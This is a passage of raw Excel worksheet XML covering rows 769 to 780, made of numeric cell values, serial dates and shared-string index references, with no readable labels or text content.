      <c r="Y769">
        <v>0</v>
      </c>
      <c r="Z769">
        <v>0</v>
      </c>
      <c r="AA769">
        <v>0</v>
      </c>
      <c r="AB769">
        <v>1000</v>
      </c>
      <c r="AC769">
        <v>10000</v>
      </c>
      <c r="AD769">
        <v>0</v>
      </c>
      <c r="AE769">
        <v>0</v>
      </c>
      <c r="AF769" t="s">
        <v>6010</v>
      </c>
      <c r="AG769">
        <v>15125</v>
      </c>
      <c r="AH769">
        <v>11</v>
      </c>
      <c r="AJ769">
        <v>270</v>
      </c>
      <c r="AK769" t="s">
        <v>1048</v>
      </c>
      <c r="AL769" t="s">
        <v>1048</v>
      </c>
      <c r="AM769" t="s">
        <v>6011</v>
      </c>
      <c r="AN769" t="s">
        <v>55</v>
      </c>
      <c r="AO769">
        <v>2018</v>
      </c>
      <c r="AP769">
        <v>816719181</v>
      </c>
      <c r="AQ769">
        <v>816719181</v>
      </c>
      <c r="AR769" t="s">
        <v>6010</v>
      </c>
      <c r="AS769" t="s">
        <v>57</v>
      </c>
      <c r="AT769" t="s">
        <v>58</v>
      </c>
      <c r="AU769">
        <v>24</v>
      </c>
      <c r="AV769">
        <v>0</v>
      </c>
      <c r="AW769">
        <v>0</v>
      </c>
      <c r="AX769">
        <v>0</v>
      </c>
      <c r="AY769">
        <v>13</v>
      </c>
      <c r="AZ769">
        <v>0</v>
      </c>
      <c r="BA769" t="s">
        <v>17024</v>
      </c>
      <c r="BB769" t="s">
        <v>15590</v>
      </c>
      <c r="BC769">
        <v>0</v>
      </c>
      <c r="BD769">
        <v>0</v>
      </c>
    </row>
    <row r="770" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A770">
        <v>2675</v>
      </c>
      <c r="B770" t="s">
        <v>6012</v>
      </c>
      <c r="C770" t="s">
        <v>318</v>
      </c>
      <c r="D770" t="s">
        <v>6013</v>
      </c>
      <c r="E770" t="s">
        <v>843</v>
      </c>
      <c r="F770" t="s">
        <v>6014</v>
      </c>
      <c r="G770" s="1">
        <v>44011</v>
      </c>
      <c r="H770">
        <v>3456</v>
      </c>
      <c r="I770">
        <v>3456</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t="s">
        <v>6015</v>
      </c>
      <c r="AG770">
        <v>90241</v>
      </c>
      <c r="AH770">
        <v>26</v>
      </c>
      <c r="AJ770">
        <v>420</v>
      </c>
      <c r="AK770" t="s">
        <v>331</v>
      </c>
      <c r="AL770" t="s">
        <v>332</v>
      </c>
      <c r="AM770" t="s">
        <v>6016</v>
      </c>
      <c r="AN770" t="s">
        <v>55</v>
      </c>
      <c r="AO770">
        <v>2005</v>
      </c>
      <c r="AP770">
        <v>85341472989</v>
      </c>
      <c r="AQ770" t="s">
        <v>6017</v>
      </c>
      <c r="AR770" t="s">
        <v>6015</v>
      </c>
      <c r="AS770" t="s">
        <v>71</v>
      </c>
      <c r="AT770" t="s">
        <v>58</v>
      </c>
      <c r="AU770">
        <v>26</v>
      </c>
      <c r="AV770">
        <v>0</v>
      </c>
      <c r="AW770">
        <v>3</v>
      </c>
      <c r="AX770">
        <v>7</v>
      </c>
      <c r="AY770">
        <v>2</v>
      </c>
      <c r="AZ770">
        <v>3</v>
      </c>
      <c r="BA770" t="s">
        <v>17259</v>
      </c>
      <c r="BB770" t="s">
        <v>15895</v>
      </c>
      <c r="BC770" t="s">
        <v>11006</v>
      </c>
      <c r="BD770" t="s">
        <v>11004</v>
      </c>
    </row>
    <row r="771" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A771">
        <v>2596</v>
      </c>
      <c r="B771" t="s">
        <v>6018</v>
      </c>
      <c r="C771" t="s">
        <v>199</v>
      </c>
      <c r="D771" t="s">
        <v>6019</v>
      </c>
      <c r="E771" t="s">
        <v>142</v>
      </c>
      <c r="F771" t="s">
        <v>1746</v>
      </c>
      <c r="G771" s="1">
        <v>44131</v>
      </c>
      <c r="H771">
        <v>3562</v>
      </c>
      <c r="I771">
        <v>3562</v>
      </c>
      <c r="J771">
        <v>1</v>
      </c>
      <c r="K771">
        <v>1</v>
      </c>
      <c r="L771">
        <v>1</v>
      </c>
      <c r="M771">
        <v>0</v>
      </c>
      <c r="N771">
        <v>0</v>
      </c>
      <c r="O771">
        <v>0</v>
      </c>
      <c r="P771">
        <v>0</v>
      </c>
      <c r="Q771">
        <v>1</v>
      </c>
      <c r="R771">
        <v>0</v>
      </c>
      <c r="S771">
        <v>0</v>
      </c>
      <c r="T771">
        <v>0</v>
      </c>
      <c r="U771">
        <v>150000</v>
      </c>
      <c r="V771">
        <v>20000</v>
      </c>
      <c r="W771">
        <v>5000</v>
      </c>
      <c r="X771">
        <v>0</v>
      </c>
      <c r="Y771">
        <v>0</v>
      </c>
      <c r="Z771">
        <v>0</v>
      </c>
      <c r="AA771">
        <v>0</v>
      </c>
      <c r="AB771">
        <v>20</v>
      </c>
      <c r="AC771">
        <v>0</v>
      </c>
      <c r="AD771">
        <v>0</v>
      </c>
      <c r="AE771">
        <v>0</v>
      </c>
      <c r="AF771" t="s">
        <v>6020</v>
      </c>
      <c r="AG771">
        <v>23611</v>
      </c>
      <c r="AH771">
        <v>1</v>
      </c>
      <c r="AJ771">
        <v>7</v>
      </c>
      <c r="AK771" t="s">
        <v>6021</v>
      </c>
      <c r="AL771" t="s">
        <v>6022</v>
      </c>
      <c r="AM771" t="s">
        <v>6023</v>
      </c>
      <c r="AN771" t="s">
        <v>55</v>
      </c>
      <c r="AO771">
        <v>2009</v>
      </c>
      <c r="AP771">
        <v>82360225385</v>
      </c>
      <c r="AQ771" t="s">
        <v>6024</v>
      </c>
      <c r="AR771" t="s">
        <v>6025</v>
      </c>
      <c r="AS771" t="s">
        <v>71</v>
      </c>
      <c r="AT771" t="s">
        <v>58</v>
      </c>
      <c r="AU771">
        <v>26</v>
      </c>
      <c r="AV771">
        <v>1</v>
      </c>
      <c r="AW771">
        <v>4</v>
      </c>
      <c r="AX771">
        <v>25</v>
      </c>
      <c r="AY771">
        <v>13</v>
      </c>
      <c r="AZ771">
        <v>19</v>
      </c>
      <c r="BA771" t="s">
        <v>16744</v>
      </c>
      <c r="BB771">
        <v>0</v>
      </c>
      <c r="BC771">
        <v>0</v>
      </c>
      <c r="BD771" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="772" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A772">
        <v>2698</v>
      </c>
      <c r="B772" t="s">
        <v>6026</v>
      </c>
      <c r="C772" t="s">
        <v>157</v>
      </c>
      <c r="D772" t="s">
        <v>6027</v>
      </c>
      <c r="E772" t="s">
        <v>49</v>
      </c>
      <c r="F772" t="s">
        <v>4037</v>
      </c>
      <c r="G772" s="1">
        <v>44232</v>
      </c>
      <c r="H772">
        <v>3595</v>
      </c>
      <c r="I772">
        <v>3595</v>
      </c>
      <c r="J772">
        <v>0</v>
      </c>
      <c r="K772">
        <v>0</v>
      </c>
      <c r="L772">
        <v>0</v>
      </c>
      <c r="M772">
        <v>0</v>
      </c>
      <c r="N772">
        <v>0</v>
      </c>
      <c r="O772">
        <v>0</v>
      </c>
      <c r="P772">
        <v>0</v>
      </c>
      <c r="Q772">
        <v>0</v>
      </c>
      <c r="R772">
        <v>0</v>
      </c>
      <c r="S772">
        <v>0</v>
      </c>
      <c r="T772">
        <v>1</v>
      </c>
      <c r="U772">
        <v>0</v>
      </c>
      <c r="V772">
        <v>0</v>
      </c>
      <c r="W772">
        <v>0</v>
      </c>
      <c r="X772">
        <v>0</v>
      </c>
      <c r="Y772">
        <v>0</v>
      </c>
      <c r="Z772">
        <v>0</v>
      </c>
      <c r="AA772">
        <v>0</v>
      </c>
      <c r="AB772">
        <v>0</v>
      </c>
      <c r="AC772">
        <v>0</v>
      </c>
      <c r="AD772">
        <v>1</v>
      </c>
      <c r="AE772">
        <v>0</v>
      </c>
      <c r="AF772" t="s">
        <v>6028</v>
      </c>
      <c r="AG772">
        <v>61264</v>
      </c>
      <c r="AH772">
        <v>16</v>
      </c>
      <c r="AJ772">
        <v>242</v>
      </c>
      <c r="AK772" t="s">
        <v>6029</v>
      </c>
      <c r="AL772" t="s">
        <v>6030</v>
      </c>
      <c r="AM772" t="s">
        <v>6031</v>
      </c>
      <c r="AN772" t="s">
        <v>68</v>
      </c>
      <c r="AO772">
        <v>1989</v>
      </c>
      <c r="AP772">
        <v>318971589</v>
      </c>
      <c r="AQ772" t="s">
        <v>6032</v>
      </c>
      <c r="AR772" t="s">
        <v>6033</v>
      </c>
      <c r="AS772" t="s">
        <v>71</v>
      </c>
      <c r="AT772" t="s">
        <v>72</v>
      </c>
      <c r="AU772">
        <v>5</v>
      </c>
      <c r="AV772">
        <v>1</v>
      </c>
      <c r="AW772">
        <v>50</v>
      </c>
      <c r="AX772">
        <v>18</v>
      </c>
      <c r="AY772">
        <v>25</v>
      </c>
      <c r="AZ772">
        <v>105</v>
      </c>
      <c r="BA772" t="s">
        <v>17274</v>
      </c>
      <c r="BB772">
        <v>0</v>
      </c>
      <c r="BC772" t="s">
        <v>9536</v>
      </c>
      <c r="BD772">
        <v>0</v>
      </c>
    </row>
    <row r="773" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A773">
        <v>2622</v>
      </c>
      <c r="B773" t="s">
        <v>6034</v>
      </c>
      <c r="C773" t="s">
        <v>168</v>
      </c>
      <c r="D773" t="s">
        <v>6035</v>
      </c>
      <c r="E773" t="s">
        <v>131</v>
      </c>
      <c r="F773" t="s">
        <v>3318</v>
      </c>
      <c r="G773" s="1">
        <v>44103</v>
      </c>
      <c r="H773">
        <v>3645</v>
      </c>
      <c r="I773">
        <v>3645</v>
      </c>
      <c r="J773">
        <v>0</v>
      </c>
      <c r="K773">
        <v>0</v>
      </c>
      <c r="L773">
        <v>0</v>
      </c>
      <c r="M773">
        <v>0</v>
      </c>
      <c r="N773">
        <v>0</v>
      </c>
      <c r="O773">
        <v>0</v>
      </c>
      <c r="P773">
        <v>0</v>
      </c>
      <c r="Q773">
        <v>0</v>
      </c>
      <c r="R773">
        <v>0</v>
      </c>
      <c r="S773">
        <v>0</v>
      </c>
      <c r="T773">
        <v>1</v>
      </c>
      <c r="U773">
        <v>0</v>
      </c>
      <c r="V773">
        <v>0</v>
      </c>
      <c r="W773">
        <v>0</v>
      </c>
      <c r="X773">
        <v>0</v>
      </c>
      <c r="Y773">
        <v>0</v>
      </c>
      <c r="Z773">
        <v>0</v>
      </c>
      <c r="AA773">
        <v>0</v>
      </c>
      <c r="AB773">
        <v>0</v>
      </c>
      <c r="AC773">
        <v>0</v>
      </c>
      <c r="AD773">
        <v>0</v>
      </c>
      <c r="AE773">
        <v>15</v>
      </c>
      <c r="AF773" t="s">
        <v>6036</v>
      </c>
      <c r="AG773">
        <v>17350</v>
      </c>
      <c r="AH773">
        <v>13</v>
      </c>
      <c r="AJ773">
        <v>176</v>
      </c>
      <c r="AK773" t="s">
        <v>6037</v>
      </c>
      <c r="AL773" t="s">
        <v>6038</v>
      </c>
      <c r="AM773" t="s">
        <v>6039</v>
      </c>
      <c r="AN773" t="s">
        <v>82</v>
      </c>
      <c r="AO773">
        <v>2017</v>
      </c>
      <c r="AP773">
        <v>2129527188</v>
      </c>
      <c r="AQ773" t="s">
        <v>6040</v>
      </c>
      <c r="AR773" t="s">
        <v>6041</v>
      </c>
      <c r="AS773" t="s">
        <v>553</v>
      </c>
      <c r="AT773" t="s">
        <v>86</v>
      </c>
      <c r="AU773">
        <v>0</v>
      </c>
      <c r="AV773">
        <v>0</v>
      </c>
      <c r="AW773">
        <v>0</v>
      </c>
      <c r="AX773">
        <v>0</v>
      </c>
      <c r="AY773">
        <v>6</v>
      </c>
      <c r="AZ773">
        <v>2</v>
      </c>
      <c r="BA773" t="s">
        <v>17219</v>
      </c>
      <c r="BB773">
        <v>0</v>
      </c>
      <c r="BC773" t="s">
        <v>11397</v>
      </c>
      <c r="BD773">
        <v>0</v>
      </c>
    </row>
    <row r="774" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A774">
        <v>2429</v>
      </c>
      <c r="B774" t="s">
        <v>6042</v>
      </c>
      <c r="C774" t="s">
        <v>47</v>
      </c>
      <c r="D774" t="s">
        <v>6043</v>
      </c>
      <c r="E774" t="s">
        <v>111</v>
      </c>
      <c r="F774" t="s">
        <v>6044</v>
      </c>
      <c r="G774" s="1">
        <v>44300</v>
      </c>
      <c r="H774">
        <v>3668</v>
      </c>
      <c r="I774">
        <v>3668</v>
      </c>
      <c r="J774">
        <v>0</v>
      </c>
      <c r="K774">
        <v>1</v>
      </c>
      <c r="L774">
        <v>0</v>
      </c>
      <c r="M774">
        <v>3</v>
      </c>
      <c r="N774">
        <v>0</v>
      </c>
      <c r="O774">
        <v>0</v>
      </c>
      <c r="P774">
        <v>0</v>
      </c>
      <c r="Q774">
        <v>1</v>
      </c>
      <c r="R774">
        <v>1</v>
      </c>
      <c r="S774">
        <v>1</v>
      </c>
      <c r="T774">
        <v>0</v>
      </c>
      <c r="U774">
        <v>0</v>
      </c>
      <c r="V774">
        <v>200000</v>
      </c>
      <c r="W774">
        <v>0</v>
      </c>
      <c r="X774">
        <v>3750</v>
      </c>
      <c r="Y774">
        <v>0</v>
      </c>
      <c r="Z774">
        <v>0</v>
      </c>
      <c r="AA774">
        <v>0</v>
      </c>
      <c r="AB774">
        <v>500</v>
      </c>
      <c r="AC774">
        <v>2000</v>
      </c>
      <c r="AD774">
        <v>1</v>
      </c>
      <c r="AE774">
        <v>0</v>
      </c>
      <c r="AF774" t="s">
        <v>6045</v>
      </c>
      <c r="AG774">
        <v>20413</v>
      </c>
      <c r="AH774">
        <v>2</v>
      </c>
      <c r="AJ774">
        <v>53</v>
      </c>
      <c r="AK774" t="s">
        <v>2220</v>
      </c>
      <c r="AL774" t="s">
        <v>2221</v>
      </c>
      <c r="AM774" t="s">
        <v>6046</v>
      </c>
      <c r="AN774" t="s">
        <v>55</v>
      </c>
      <c r="AO774">
        <v>2004</v>
      </c>
      <c r="AP774">
        <v>81260827788</v>
      </c>
      <c r="AQ774">
        <v>81260827788</v>
      </c>
      <c r="AR774" t="s">
        <v>6045</v>
      </c>
      <c r="AS774" t="s">
        <v>71</v>
      </c>
      <c r="AT774" t="s">
        <v>58</v>
      </c>
      <c r="AU774">
        <v>26</v>
      </c>
      <c r="AV774">
        <v>2</v>
      </c>
      <c r="AW774">
        <v>4</v>
      </c>
      <c r="AX774">
        <v>1</v>
      </c>
      <c r="AY774">
        <v>1</v>
      </c>
      <c r="AZ774">
        <v>1</v>
      </c>
      <c r="BA774" t="s">
        <v>16747</v>
      </c>
      <c r="BB774" t="s">
        <v>14805</v>
      </c>
      <c r="BC774" t="s">
        <v>13604</v>
      </c>
      <c r="BD774" t="s">
        <v>13605</v>
      </c>
    </row>
    <row r="775" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A775">
        <v>2272</v>
      </c>
      <c r="B775" t="s">
        <v>6047</v>
      </c>
      <c r="C775" t="s">
        <v>129</v>
      </c>
      <c r="D775" t="s">
        <v>6048</v>
      </c>
      <c r="E775" t="s">
        <v>111</v>
      </c>
      <c r="F775" t="s">
        <v>6049</v>
      </c>
      <c r="G775" s="1">
        <v>44046</v>
      </c>
      <c r="H775">
        <v>3677</v>
      </c>
      <c r="I775">
        <v>3677</v>
      </c>
      <c r="J775">
        <v>1</v>
      </c>
      <c r="K775">
        <v>0</v>
      </c>
      <c r="L775">
        <v>0</v>
      </c>
      <c r="M775">
        <v>0</v>
      </c>
      <c r="N775">
        <v>0</v>
      </c>
      <c r="O775">
        <v>0</v>
      </c>
      <c r="P775">
        <v>0</v>
      </c>
      <c r="Q775">
        <v>1</v>
      </c>
      <c r="R775">
        <v>0</v>
      </c>
      <c r="S775">
        <v>0</v>
      </c>
      <c r="T775">
        <v>0</v>
      </c>
      <c r="U775">
        <v>158000</v>
      </c>
      <c r="V775">
        <v>0</v>
      </c>
      <c r="W775">
        <v>0</v>
      </c>
      <c r="X775">
        <v>0</v>
      </c>
      <c r="Y775">
        <v>0</v>
      </c>
      <c r="Z775">
        <v>0</v>
      </c>
      <c r="AA775">
        <v>0</v>
      </c>
      <c r="AB775">
        <v>0</v>
      </c>
      <c r="AC775">
        <v>0</v>
      </c>
      <c r="AD775">
        <v>0</v>
      </c>
      <c r="AE775">
        <v>0</v>
      </c>
      <c r="AF775" t="s">
        <v>6050</v>
      </c>
      <c r="AG775">
        <v>0</v>
      </c>
      <c r="AH775">
        <v>11</v>
      </c>
      <c r="AJ775">
        <v>268</v>
      </c>
      <c r="AK775" t="s">
        <v>6051</v>
      </c>
      <c r="AL775" t="s">
        <v>6052</v>
      </c>
      <c r="AM775" t="s">
        <v>6053</v>
      </c>
      <c r="AN775" t="s">
        <v>55</v>
      </c>
      <c r="AO775">
        <v>1982</v>
      </c>
      <c r="AP775" t="s">
        <v>6054</v>
      </c>
      <c r="AQ775" t="s">
        <v>6055</v>
      </c>
      <c r="AR775" t="s">
        <v>4985</v>
      </c>
      <c r="AS775" t="s">
        <v>179</v>
      </c>
      <c r="AT775" t="s">
        <v>58</v>
      </c>
      <c r="AU775">
        <v>26</v>
      </c>
      <c r="AV775">
        <v>2</v>
      </c>
      <c r="AW775">
        <v>0</v>
      </c>
      <c r="AX775">
        <v>0</v>
      </c>
      <c r="AY775">
        <v>26</v>
      </c>
      <c r="AZ775">
        <v>0</v>
      </c>
      <c r="BA775" t="s">
        <v>16635</v>
      </c>
      <c r="BB775" t="s">
        <v>15929</v>
      </c>
      <c r="BC775" t="s">
        <v>11041</v>
      </c>
      <c r="BD775">
        <v>0</v>
      </c>
    </row>
    <row r="776" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A776">
        <v>2368</v>
      </c>
      <c r="B776" t="s">
        <v>6056</v>
      </c>
      <c r="C776" t="s">
        <v>99</v>
      </c>
      <c r="D776" t="s">
        <v>6057</v>
      </c>
      <c r="E776" t="s">
        <v>142</v>
      </c>
      <c r="F776" t="s">
        <v>6058</v>
      </c>
      <c r="G776" s="1">
        <v>44018</v>
      </c>
      <c r="H776">
        <v>3680</v>
      </c>
      <c r="I776">
        <v>3680</v>
      </c>
      <c r="J776">
        <v>1</v>
      </c>
      <c r="K776">
        <v>0</v>
      </c>
      <c r="L776">
        <v>1</v>
      </c>
      <c r="M776">
        <v>0</v>
      </c>
      <c r="N776">
        <v>0</v>
      </c>
      <c r="O776">
        <v>0</v>
      </c>
      <c r="P776">
        <v>0</v>
      </c>
      <c r="Q776">
        <v>0</v>
      </c>
      <c r="R776">
        <v>0</v>
      </c>
      <c r="S776">
        <v>0</v>
      </c>
      <c r="T776">
        <v>1</v>
      </c>
      <c r="U776">
        <v>700000</v>
      </c>
      <c r="V776">
        <v>0</v>
      </c>
      <c r="W776">
        <v>10000</v>
      </c>
      <c r="X776">
        <v>0</v>
      </c>
      <c r="Y776">
        <v>0</v>
      </c>
      <c r="Z776">
        <v>0</v>
      </c>
      <c r="AA776">
        <v>0</v>
      </c>
      <c r="AB776">
        <v>0</v>
      </c>
      <c r="AC776">
        <v>0</v>
      </c>
      <c r="AD776">
        <v>0</v>
      </c>
      <c r="AE776">
        <v>2000</v>
      </c>
      <c r="AF776" t="s">
        <v>6059</v>
      </c>
      <c r="AG776">
        <v>14440</v>
      </c>
      <c r="AH776">
        <v>12</v>
      </c>
      <c r="AJ776">
        <v>160</v>
      </c>
      <c r="AK776" t="s">
        <v>114</v>
      </c>
      <c r="AL776" t="s">
        <v>114</v>
      </c>
      <c r="AM776" t="s">
        <v>6060</v>
      </c>
      <c r="AN776" t="s">
        <v>55</v>
      </c>
      <c r="AO776">
        <v>2013</v>
      </c>
      <c r="AP776" t="s">
        <v>6061</v>
      </c>
      <c r="AQ776" t="s">
        <v>6062</v>
      </c>
      <c r="AR776" t="s">
        <v>6063</v>
      </c>
      <c r="AS776" t="s">
        <v>187</v>
      </c>
      <c r="AT776" t="s">
        <v>58</v>
      </c>
      <c r="AU776">
        <v>26</v>
      </c>
      <c r="AV776">
        <v>1</v>
      </c>
      <c r="AW776">
        <v>17</v>
      </c>
      <c r="AX776">
        <v>0</v>
      </c>
      <c r="AY776">
        <v>16</v>
      </c>
      <c r="AZ776">
        <v>7</v>
      </c>
      <c r="BA776" t="s">
        <v>16739</v>
      </c>
      <c r="BB776" t="s">
        <v>14786</v>
      </c>
      <c r="BC776" t="s">
        <v>10995</v>
      </c>
      <c r="BD776" t="s">
        <v>10998</v>
      </c>
    </row>
    <row r="777" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A777">
        <v>2703</v>
      </c>
      <c r="B777" t="s">
        <v>6064</v>
      </c>
      <c r="C777" t="s">
        <v>318</v>
      </c>
      <c r="D777" t="s">
        <v>6065</v>
      </c>
      <c r="E777" t="s">
        <v>843</v>
      </c>
      <c r="F777" t="s">
        <v>6066</v>
      </c>
      <c r="G777" s="1">
        <v>43997</v>
      </c>
      <c r="H777">
        <v>3712</v>
      </c>
      <c r="I777">
        <v>3712</v>
      </c>
      <c r="J777">
        <v>0</v>
      </c>
      <c r="K777">
        <v>1</v>
      </c>
      <c r="L777">
        <v>0</v>
      </c>
      <c r="M777">
        <v>0</v>
      </c>
      <c r="N777">
        <v>0</v>
      </c>
      <c r="O777">
        <v>0</v>
      </c>
      <c r="P777">
        <v>0</v>
      </c>
      <c r="Q777">
        <v>2</v>
      </c>
      <c r="R777">
        <v>15</v>
      </c>
      <c r="S777">
        <v>0</v>
      </c>
      <c r="T777">
        <v>0</v>
      </c>
      <c r="U777">
        <v>0</v>
      </c>
      <c r="V777">
        <v>15000</v>
      </c>
      <c r="W777">
        <v>0</v>
      </c>
      <c r="X777">
        <v>0</v>
      </c>
      <c r="Y777">
        <v>0</v>
      </c>
      <c r="Z777">
        <v>0</v>
      </c>
      <c r="AA777">
        <v>0</v>
      </c>
      <c r="AB777">
        <v>100</v>
      </c>
      <c r="AC777">
        <v>15000</v>
      </c>
      <c r="AD777">
        <v>0</v>
      </c>
      <c r="AE777">
        <v>0</v>
      </c>
      <c r="AF777" t="s">
        <v>6067</v>
      </c>
      <c r="AG777">
        <v>90162</v>
      </c>
      <c r="AH777">
        <v>26</v>
      </c>
      <c r="AJ777">
        <v>420</v>
      </c>
      <c r="AK777" t="s">
        <v>2663</v>
      </c>
      <c r="AL777" t="s">
        <v>2740</v>
      </c>
      <c r="AM777" t="s">
        <v>6068</v>
      </c>
      <c r="AN777" t="s">
        <v>55</v>
      </c>
      <c r="AO777">
        <v>2016</v>
      </c>
      <c r="AP777">
        <v>8114496723</v>
      </c>
      <c r="AQ777" t="s">
        <v>6069</v>
      </c>
      <c r="AR777" t="s">
        <v>6067</v>
      </c>
      <c r="AS777" t="s">
        <v>71</v>
      </c>
      <c r="AT777" t="s">
        <v>58</v>
      </c>
      <c r="AU777">
        <v>7</v>
      </c>
      <c r="AV777">
        <v>0</v>
      </c>
      <c r="AW777">
        <v>5</v>
      </c>
      <c r="AX777">
        <v>0</v>
      </c>
      <c r="AY777">
        <v>6</v>
      </c>
      <c r="AZ777">
        <v>1</v>
      </c>
      <c r="BA777" t="s">
        <v>17277</v>
      </c>
      <c r="BB777" t="s">
        <v>17283</v>
      </c>
      <c r="BC777" t="s">
        <v>10323</v>
      </c>
      <c r="BD777" t="s">
        <v>11077</v>
      </c>
    </row>
    <row r="778" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A778">
        <v>2097</v>
      </c>
      <c r="B778" t="s">
        <v>6070</v>
      </c>
      <c r="C778" t="s">
        <v>47</v>
      </c>
      <c r="D778" t="s">
        <v>6071</v>
      </c>
      <c r="E778" t="s">
        <v>682</v>
      </c>
      <c r="F778" t="s">
        <v>6072</v>
      </c>
      <c r="G778" s="1">
        <v>44095</v>
      </c>
      <c r="H778">
        <v>3744</v>
      </c>
      <c r="I778">
        <v>3744</v>
      </c>
      <c r="J778">
        <v>3</v>
      </c>
      <c r="K778">
        <v>0</v>
      </c>
      <c r="L778">
        <v>3</v>
      </c>
      <c r="M778">
        <v>0</v>
      </c>
      <c r="N778">
        <v>0</v>
      </c>
      <c r="O778">
        <v>3</v>
      </c>
      <c r="P778">
        <v>0</v>
      </c>
      <c r="Q778">
        <v>1</v>
      </c>
      <c r="R778">
        <v>0</v>
      </c>
      <c r="S778">
        <v>0</v>
      </c>
      <c r="T778">
        <v>1</v>
      </c>
      <c r="U778">
        <v>4000</v>
      </c>
      <c r="V778">
        <v>0</v>
      </c>
      <c r="W778">
        <v>0</v>
      </c>
      <c r="X778">
        <v>0</v>
      </c>
      <c r="Y778">
        <v>0</v>
      </c>
      <c r="Z778">
        <v>4000</v>
      </c>
      <c r="AA778">
        <v>0</v>
      </c>
      <c r="AB778">
        <v>0</v>
      </c>
      <c r="AC778">
        <v>0</v>
      </c>
      <c r="AD778">
        <v>0</v>
      </c>
      <c r="AE778">
        <v>30000</v>
      </c>
      <c r="AF778" t="s">
        <v>6073</v>
      </c>
      <c r="AG778">
        <v>21263</v>
      </c>
      <c r="AH778">
        <v>2</v>
      </c>
      <c r="AJ778">
        <v>31</v>
      </c>
      <c r="AK778" t="s">
        <v>6074</v>
      </c>
      <c r="AL778" t="s">
        <v>6075</v>
      </c>
      <c r="AM778" t="s">
        <v>6076</v>
      </c>
      <c r="AN778" t="s">
        <v>55</v>
      </c>
      <c r="AO778">
        <v>2019</v>
      </c>
      <c r="AP778">
        <v>81263974787</v>
      </c>
      <c r="AQ778" t="s">
        <v>6077</v>
      </c>
      <c r="AR778" t="s">
        <v>6073</v>
      </c>
      <c r="AU778">
        <v>26</v>
      </c>
      <c r="AV778">
        <v>0</v>
      </c>
      <c r="AW778">
        <v>2</v>
      </c>
      <c r="AX778">
        <v>0</v>
      </c>
      <c r="AY778">
        <v>3</v>
      </c>
      <c r="AZ778">
        <v>7</v>
      </c>
      <c r="BA778" t="s">
        <v>17063</v>
      </c>
      <c r="BB778" t="s">
        <v>15696</v>
      </c>
      <c r="BC778" t="s">
        <v>9603</v>
      </c>
      <c r="BD778" t="s">
        <v>11024</v>
      </c>
    </row>
    <row r="779" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A779">
        <v>2335</v>
      </c>
      <c r="B779" t="s">
        <v>6078</v>
      </c>
      <c r="C779" t="s">
        <v>99</v>
      </c>
      <c r="D779" t="s">
        <v>6079</v>
      </c>
      <c r="E779" t="s">
        <v>142</v>
      </c>
      <c r="F779" t="s">
        <v>6080</v>
      </c>
      <c r="G779" s="1">
        <v>44046</v>
      </c>
      <c r="H779">
        <v>3849</v>
      </c>
      <c r="I779">
        <v>3849</v>
      </c>
      <c r="J779">
        <v>2</v>
      </c>
      <c r="K779">
        <v>0</v>
      </c>
      <c r="L779">
        <v>0</v>
      </c>
      <c r="M779">
        <v>350</v>
      </c>
      <c r="N779">
        <v>0</v>
      </c>
      <c r="O779">
        <v>0</v>
      </c>
      <c r="P779">
        <v>0</v>
      </c>
      <c r="Q779">
        <v>0</v>
      </c>
      <c r="R779">
        <v>1</v>
      </c>
      <c r="S779">
        <v>0</v>
      </c>
      <c r="T779">
        <v>0</v>
      </c>
      <c r="U779">
        <v>700000</v>
      </c>
      <c r="V779">
        <v>0</v>
      </c>
      <c r="W779">
        <v>0</v>
      </c>
      <c r="X779">
        <v>0</v>
      </c>
      <c r="Y779">
        <v>0</v>
      </c>
      <c r="Z779">
        <v>0</v>
      </c>
      <c r="AA779">
        <v>0</v>
      </c>
      <c r="AB779">
        <v>0</v>
      </c>
      <c r="AC779">
        <v>20000</v>
      </c>
      <c r="AD779">
        <v>0</v>
      </c>
      <c r="AE779">
        <v>0</v>
      </c>
      <c r="AF779" t="s">
        <v>6081</v>
      </c>
      <c r="AG779">
        <v>14430</v>
      </c>
      <c r="AH779">
        <v>12</v>
      </c>
      <c r="AJ779">
        <v>160</v>
      </c>
      <c r="AK779" t="s">
        <v>114</v>
      </c>
      <c r="AL779" t="s">
        <v>115</v>
      </c>
      <c r="AM779" t="s">
        <v>6082</v>
      </c>
      <c r="AN779" t="s">
        <v>55</v>
      </c>
      <c r="AO779">
        <v>2014</v>
      </c>
      <c r="AP779">
        <v>8128983826</v>
      </c>
      <c r="AQ779" t="s">
        <v>6083</v>
      </c>
      <c r="AR779" t="s">
        <v>6081</v>
      </c>
      <c r="AU779">
        <v>30</v>
      </c>
      <c r="AV779">
        <v>0</v>
      </c>
      <c r="AW779">
        <v>0</v>
      </c>
      <c r="AX779">
        <v>0</v>
      </c>
      <c r="AY779">
        <v>18</v>
      </c>
      <c r="AZ779">
        <v>21</v>
      </c>
      <c r="BA779" t="s">
        <v>17136</v>
      </c>
      <c r="BB779" t="s">
        <v>15838</v>
      </c>
      <c r="BC779" t="s">
        <v>11071</v>
      </c>
      <c r="BD779" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="780" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A780">
        <v>2686</v>
      </c>
      <c r="B780" t="s">
        <v>6084</v>
      </c>
      <c r="C780" t="s">
        <v>5506</v>
      </c>
      <c r="D780" t="s">
        <v>6085</v>
      </c>
      <c r="E780" t="s">
        <v>131</v>
      </c>
      <c r="F780" t="s">
        <v>6086</v>
      </c>
      <c r="G780" s="1">
        <v>43984</v>
      </c>
      <c r="H780">
        <v>3967</v>
      </c>
      <c r="I780">
        <v>3967</v>
      </c>
      <c r="J780">
        <v>0</v>
      </c>
      <c r="K780">
        <v>0</v>
      </c>
      <c r="L780">
        <v>0</v>
      </c>
      <c r="M780">
        <v>0</v>
      </c>
      <c r="N780">
        <v>0</v>
      </c>
      <c r="O780">
        <v>0</v>
      </c>
      <c r="P780">
        <v>0</v>
      </c>
      <c r="Q780">
        <v>4</v>
      </c>
      <c r="R780">
        <v>9</v>
      </c>
      <c r="S780">
        <v>0</v>
      </c>
      <c r="T780">
        <v>2</v>
      </c>
